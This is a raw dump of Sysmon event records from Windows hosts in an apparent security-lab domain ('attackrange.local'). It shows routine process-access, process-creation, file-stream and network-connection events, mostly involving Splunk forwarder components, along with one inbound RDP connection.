14:54:54.858{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049587Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049586Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049585Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049584Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB3E-607E-D406-00000000BB01}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049583Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB3E-607E-D406-00000000BB01}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049582Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-EB3E-607E-D406-00000000BB01}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049581Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.561{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=247D027595B91F3A964CE54A35142B7E,SHA256=78981E50A775728DAB579684FAB225DB673D5ADF5E597C12E89B8DDC03E2B716,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049580Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:52.223{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63408-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000064938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:55.627{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2FCAB6B60A80D4022C6C2A59ED032FF,SHA256=CC7604A2F1B6CC0CAF42513B987164CE1A2AC55DD65D30885C1F67A8397418CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:55.517{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F094FC10FF59BE86D7D8421E5EFC82E1,SHA256=E0C967825496410092559DF5E9F63A7918E596CDC06B5E50C56B58AB99BD92DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049611Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.592{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FEF9FF0EB635640941B17F3282C829D,SHA256=2B4169BCF06007958183A42D6767B781B940BD3DFF97274B3329E0A7064434DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049610Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:53.747{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52492-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000049609Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.483{85C0FFC9-EB3F-607E-D506-00000000BB01}3482544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049608Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB3F-607E-D506-00000000BB01}348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049607Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049606Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049605Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049604Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049603Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049602Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049601Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049600Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049599Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049598Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EB3F-607E-D506-00000000BB01}348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049597Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.373{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB3F-607E-D506-00000000BB01}348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049596Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.374{85C0FFC9-EB3F-607E-D506-00000000BB01}348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049595Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.295{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37E4A06B97B339BE31A35B9CEC253F17,SHA256=2D4C68A81ED3AD1750BAEB73B2967370BDC1ACEAE73A0E97121EB0849B8C3534,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:56.642{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19618301DC295F2A2891EFBF3A81ED84,SHA256=4DBFBB46AED58DDF90667D332E958D823BA8ED58D58ED77D710785E8158553F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:56.549{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E555513F7CBF83254303CA8E2FB8A34,SHA256=92315FC033179FC84DCC77481059F326D6DD220EE7D3C06A856D1D33D31C32CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:55.135{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57496-false10.0.1.12-8000- 354300x800000000000000064942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:54.666{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57495-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000064941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:54.666{A7A01FEF-B636-607E-2600-00000000BB01}2192C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57495-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000064940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:54.478{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 